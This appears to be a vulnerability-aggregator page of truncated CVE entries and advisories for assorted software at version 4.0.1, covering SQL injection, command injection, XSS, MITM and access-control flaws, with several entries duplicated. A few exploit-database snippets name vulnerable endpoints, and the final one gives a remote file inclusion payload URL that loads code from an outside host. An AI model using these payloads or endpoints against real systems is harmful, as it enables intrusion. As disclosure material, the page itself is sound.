CVE-2024-29725

SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/app/ax/sortbloques/, parameter list...

CVE-2024-25811

An access control issue in Dreamer CMS v4.0.1 allows attackers to download backup files and leak sensitive information...

Go JOSE vulnerable to Improper Handling of Highly Compressed Data (Data Amplification)

Impact An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size whichever is larger. Thanks to Enze...

CVE-2024-25811

Dreamer CMS v4.0.1 contains an access control flaw that can allow attackers to download backup files and leak sensitive information. The issue is described across sources (including Red Hat and NVD records) as an access-control error affecting Dreamer CMS 4.0.1. There is no detailed root-cause br...

CVE-2023-46886

Dreamer CMS before version 4.0.1 is vulnerable to Directory Traversal. Background template management allows arbitrary modification of the template file, allowing system sensitive files to be read...

CVE-2020-11024

In Moonlight iOS/tvOS before 4.0.1, the pairing process is vulnerable to a man-in-the-middle attack. The bug has been fixed in Moonlight v4.0.1 for iOS and tvOS...

CVE-2020-11024

In Moonlight iOS/tvOS before 4.0.1, the pairing process is vulnerable to a man-in-the-middle attack. The bug has been fixed in Moonlight v4.0.1 for iOS and tvOS...

CVE-2020-7057

CVE-2020-7057 affects Hikvision DVR DS-7204HGHI-F1 running V4.0.1 build 180903 web interface. The login endpoint ISAPI/Security/sessionLogin/capabilities returns different responses for failed login attempts based on whether the username exists, enabling user enumeration. The description states o...

Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU - Jan 2016 - Includes Oracle Jan 2016 CPU affect Content Collector for Email

Summary There is vulnerability in IBM® SDK Java™ Technology Edition, Java™ Version 6 and Java™ Version 7 that is used by Content Collector for Email. These issues were disclosed as part of the IBM Java SDK updates in January 2016 and includes the vulnerability commonly referred to as “SLOTH”...

Security Bulletin:IBM SDK, Java Technology Edition Quarterly CPU - Apr 2016 - Includes Oracle Apr 2016 CPU affect for IBM Connections

Summary There is vulnerability in IBM® SDK Java™ Technology Edition, Java™ Version 6 and Java™ Version 7 that is used by Content Collector for IBM Connections.This issue was disclosed as part of the IBM Java SDK updates in January 2016 Vulnerability Details CVEID: CVE-2016-0264 DESCRIPTION: A...

Command injection

On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...

CVE-2010-5330

On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...

CVE-2010-5330

On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...

Security Bulletin:Cross-site scripting vulnerability in WebSphere Application Server admin console in IBM Content Collector for Email

Summary IBM WebSphere Application Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. Vulnerability Details...

Responsive Matrimonial Script 4.0.1 - SQL Injection

Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/ Demo: http://74.124.215.220/responsivematri/ Version: 4.0.1 Tested on: Win...

GPS Tools v4.0.1,4.0.1,SQL Injection

GPS Tools v4.0.1,4.0.1,SQL Injection Developer release statement to the vel team https://www.corejoomla.com/news/1163-gps-tools-v4-0-2-is-released.html...

SendStudio 4.0.1 Cross Site Scripting

======================================================================================== | Title : SendStudio v4.0.1 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | Total alerts found : 2 | High :...

SendStudio v4.0.1 Mullti Vulnerabilities

No description provided by source. ======================================================================================== | Title : SendStudio v4.0.1 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -0021377181886...

[BMSA-2009-01] Authentication bypass in Interspire Shopping Cart v4.0.1 and below

BLUE MOON SECURITY ADVISORY 2009-01 =================================== :Title: Authentication bypass in Interspire Shopping Cart :Severity: Critical :Reporter: Truong Van Tri and Blue Moon Consulting :Products: Interspire Shopping Cart v4.0.1 Ultimate edition :Fixed in: v4.0.2 Description...

Boite de News 4.0.1 - index.php Remote File Inclusion

Boite de News 4.0.1 - index.php Remote File Inclusion Boite de News v4.0.1 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/1801boiteden-401.zip Found By: the master exploit: http://Target/Path/boitenews4/index.php?urlindex=http://cmd.gif? milw0rm.com 2006-08-09...